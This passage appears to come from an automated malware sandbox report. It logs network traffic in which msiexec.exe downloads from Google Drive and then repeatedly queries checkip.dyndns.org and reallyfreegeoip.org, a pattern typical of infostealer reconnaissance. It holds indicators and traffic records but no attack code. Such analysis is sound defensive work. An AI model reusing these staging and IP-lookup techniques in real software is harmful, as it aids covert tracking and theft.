                Oct 28, 2024 06:47:19.167597055 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.175806999 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.176040888 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.176105976 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.176122904 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.176254034 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.176322937 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.176337004 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.176388979 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.176400900 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.177927971 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.184705973 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.186172962 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.186187029 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.186233044 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.186733007 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.186784983 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.193598032 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.193811893 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.193870068 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.193885088 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.194022894 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.198177099 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.202193022 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.202251911 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.202297926 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.203844070 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.203900099 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.203938007 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.204067945 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.209654093 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.210037947 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.210846901 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.210901976 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.215334892 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.218599081 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.218612909 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.218666077 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.220864058 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.220917940 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.276767015 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.276979923 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.277070045 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.277190924 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.277219057 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.277244091 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.277326107 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.277339935 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.277825117 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.277888060 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.277903080 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278007030 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278067112 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.278079987 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278131008 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.278142929 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278342962 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.278356075 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278403044 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.278697968 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278759956 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.278812885 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278863907 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.278938055 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.278985023 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.279027939 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.279077053 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.279114962 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.279162884 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.279669046 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.279723883 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.279779911 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.279824972 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.280076981 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.280129910 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.280160904 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.280215025 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.280498981 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.280551910 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.280622005 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.280673981 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.282066107 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.286001921 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.286015034 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.286071062 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.287079096 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.287139893 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.287172079 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.287225962 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.299496889 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.299666882 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.299736023 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.299750090 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.300137043 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.300232887 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.300287008 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.300302982 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.300342083 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.300365925 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.303142071 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.305995941 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.306009054 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.306061029 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.306099892 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.309113979 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.309180021 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.309194088 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.309268951 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.309386015 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.309400082 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.309448957 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.309556007 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.309644938 CET44351917172.217.16.193192.168.2.4
                Oct 28, 2024 06:47:19.309705973 CET51917443192.168.2.4172.217.16.193
                Oct 28, 2024 06:47:19.932080030 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:19.937406063 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:19.937489033 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:19.937700987 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:19.942950964 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:20.583868027 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:20.589113951 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:20.594472885 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:20.737340927 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:20.831783056 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:21.074486017 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.074510098 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.074588060 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.076383114 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.076406002 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.709203959 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.709476948 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.713382959 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.713395119 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.713849068 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.722306013 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.763374090 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.860008955 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.860157013 CET44351954188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:21.860224009 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.864732981 CET51954443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:21.870565891 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:21.875988960 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:22.018959045 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:22.031091928 CET51960443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:22.031121016 CET44351960188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:22.031222105 CET51960443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:22.031522036 CET51960443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:22.031536102 CET44351960188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:22.066174030 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:22.667310953 CET44351960188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:22.669056892 CET51960443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:22.669079065 CET44351960188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:23.846023083 CET44351960188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:23.846196890 CET44351960188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:23.846249104 CET51960443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:23.846977949 CET51960443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:23.850909948 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:23.852603912 CET5196680192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:23.856762886 CET8051943158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:23.856821060 CET5194380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:23.858134985 CET8051966158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:23.858197927 CET5196680192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:23.858371973 CET5196680192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:23.863823891 CET8051966158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:24.495786905 CET8051966158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:24.496126890 CET5196680192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:24.497018099 CET51967443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:24.497096062 CET44351967188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:24.497179985 CET51967443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:24.497406960 CET51967443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:24.497436047 CET44351967188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:24.501878977 CET8051966158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:24.501945019 CET5196680192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:25.123953104 CET44351967188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:25.125854015 CET51967443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:25.125933886 CET44351967188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:25.265706062 CET44351967188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:25.265880108 CET44351967188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:25.266026974 CET51967443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:25.266220093 CET51967443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:25.270665884 CET5197380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:25.276067019 CET8051973158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:25.276179075 CET5197380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:25.276262999 CET5197380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:25.281575918 CET8051973158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:25.914880991 CET8051973158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:25.916213036 CET51979443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:25.916245937 CET44351979188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:25.916306973 CET51979443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:25.916570902 CET51979443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:25.916582108 CET44351979188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:25.956798077 CET5197380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:26.528105021 CET44351979188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:26.529925108 CET51979443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:26.529942036 CET44351979188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:26.668926001 CET44351979188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:26.669095039 CET44351979188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:26.669353008 CET51979443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:26.669714928 CET51979443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:26.673420906 CET5197380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:26.674627066 CET5198580192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:26.679042101 CET8051973158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:26.679121971 CET5197380192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:26.680008888 CET8051985158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:26.680083990 CET5198580192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:26.680152893 CET5198580192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:26.685504913 CET8051985158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:28.170763969 CET8051985158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:28.172036886 CET51995443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:28.172139883 CET44351995188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:28.172230959 CET51995443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:28.172418118 CET51995443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:28.172447920 CET44351995188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:28.222479105 CET5198580192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:28.788654089 CET44351995188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:28.791928053 CET51995443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:28.792002916 CET44351995188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:28.933075905 CET44351995188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:28.933235884 CET44351995188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:28.933320045 CET51995443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:28.940546036 CET51995443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:29.126241922 CET5198580192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:29.127346039 CET5199880192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:29.131966114 CET8051985158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:29.132021904 CET5198580192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:29.132653952 CET8051998158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:29.132715940 CET5199880192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:29.132842064 CET5199880192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:29.138155937 CET8051998158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:30.018893003 CET8051998158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:30.019969940 CET52004443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:30.020028114 CET44352004188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:30.020095110 CET52004443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:30.020283937 CET52004443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:30.020312071 CET44352004188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:30.066180944 CET5199880192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:30.642091036 CET44352004188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:30.643659115 CET52004443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:30.643707991 CET44352004188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:30.785104990 CET44352004188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:30.785254002 CET44352004188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:30.785448074 CET52004443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:30.785520077 CET52004443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:30.788404942 CET5199880192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:30.789571047 CET5200980192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:30.793992996 CET8051998158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:30.794066906 CET5199880192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:30.794883013 CET8052009158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:30.794969082 CET5200980192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:30.795032978 CET5200980192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:30.800365925 CET8052009158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:31.445050001 CET8052009158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:31.471610069 CET52015443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:31.471681118 CET44352015188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:31.471803904 CET52015443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:31.472022057 CET52015443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:31.472062111 CET44352015188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:31.488065958 CET5200980192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:32.086922884 CET44352015188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:32.088295937 CET52015443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:32.088370085 CET44352015188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:32.234626055 CET44352015188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:32.234778881 CET44352015188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:32.234908104 CET52015443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:32.235266924 CET52015443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:32.238096952 CET5200980192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:32.239157915 CET5202180192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:32.244102001 CET8052009158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:32.244182110 CET5200980192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:32.244729042 CET8052021158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:32.244813919 CET5202180192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:32.244872093 CET5202180192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:32.250128031 CET8052021158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:32.884517908 CET8052021158.101.44.242192.168.2.4
                Oct 28, 2024 06:47:32.885570049 CET52026443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:32.885598898 CET44352026188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:32.885663986 CET52026443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:32.885864019 CET52026443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:32.885880947 CET44352026188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:32.925561905 CET5202180192.168.2.4158.101.44.242
                Oct 28, 2024 06:47:33.489042997 CET44352026188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:33.490314960 CET52026443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:33.490331888 CET44352026188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:33.629518032 CET44352026188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:33.629652023 CET44352026188.114.97.3192.168.2.4
                Oct 28, 2024 06:47:33.629698992 CET52026443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:33.629916906 CET52026443192.168.2.4188.114.97.3
                Oct 28, 2024 06:47:33.716299057 CET5202180192.168.2.4158.101.44.242
                TimestampSource PortDest PortSource IPDest IP
                Oct 28, 2024 06:46:15.807872057 CET53498591.1.1.1192.168.2.4
                Oct 28, 2024 06:47:13.577642918 CET6400053192.168.2.41.1.1.1
                Oct 28, 2024 06:47:13.585413933 CET53640001.1.1.1192.168.2.4
                Oct 28, 2024 06:47:14.928093910 CET5030053192.168.2.41.1.1.1
                Oct 28, 2024 06:47:14.935728073 CET53503001.1.1.1192.168.2.4
                Oct 28, 2024 06:47:19.916939974 CET6333753192.168.2.41.1.1.1
                Oct 28, 2024 06:47:19.924904108 CET53633371.1.1.1192.168.2.4
                Oct 28, 2024 06:47:21.065531969 CET5299053192.168.2.41.1.1.1
                Oct 28, 2024 06:47:21.073637009 CET53529901.1.1.1192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 28, 2024 06:47:13.577642918 CET192.168.2.41.1.1.10xfc2cStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:14.928093910 CET192.168.2.41.1.1.10xb18cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:19.916939974 CET192.168.2.41.1.1.10x6a9dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:21.065531969 CET192.168.2.41.1.1.10x5b0cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 28, 2024 06:47:13.585413933 CET1.1.1.1192.168.2.40xfc2cNo error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:14.935728073 CET1.1.1.1192.168.2.40xb18cNo error (0)drive.usercontent.google.com172.217.16.193A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:19.924904108 CET1.1.1.1192.168.2.40x6a9dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                Oct 28, 2024 06:47:19.924904108 CET1.1.1.1192.168.2.40x6a9dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:19.924904108 CET1.1.1.1192.168.2.40x6a9dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:19.924904108 CET1.1.1.1192.168.2.40x6a9dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:19.924904108 CET1.1.1.1192.168.2.40x6a9dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:19.924904108 CET1.1.1.1192.168.2.40x6a9dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:21.073637009 CET1.1.1.1192.168.2.40x5b0cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                Oct 28, 2024 06:47:21.073637009 CET1.1.1.1192.168.2.40x5b0cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                • drive.google.com
                • drive.usercontent.google.com
                • reallyfreegeoip.org
                • checkip.dyndns.org
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.451943158.101.44.242805788C:\Windows\SysWOW64\msiexec.exe
                TimestampBytes transferredDirectionData
                Oct 28, 2024 06:47:19.937700987 CET151OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Connection: Keep-Alive
                Oct 28, 2024 06:47:20.583868027 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:20 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: 10fdcc9968b87133ad44526926e09e49
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                Oct 28, 2024 06:47:20.589113951 CET127OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Oct 28, 2024 06:47:20.737340927 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:20 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: 6cc12b357b1cbb1d54af874a7c69c64e
                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                Oct 28, 2024 06:47:21.870565891 CET127OUTGET / HTTP/1.1
                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                Host: checkip.dyndns.org
                Oct 28, 2024 06:47:22.018959045 CET323INHTTP/1.1 200 OK
                Date: Mon, 28 Oct 2024 05:47:21 GMT
                Content-Type: text/html
                Content-Length: 106
                Connection: keep-alive
                Cache-Control: no-cache
                Pragma: no-cache
                X-Request-ID: eee82cffdcca6ff1e8a306f679f1f266
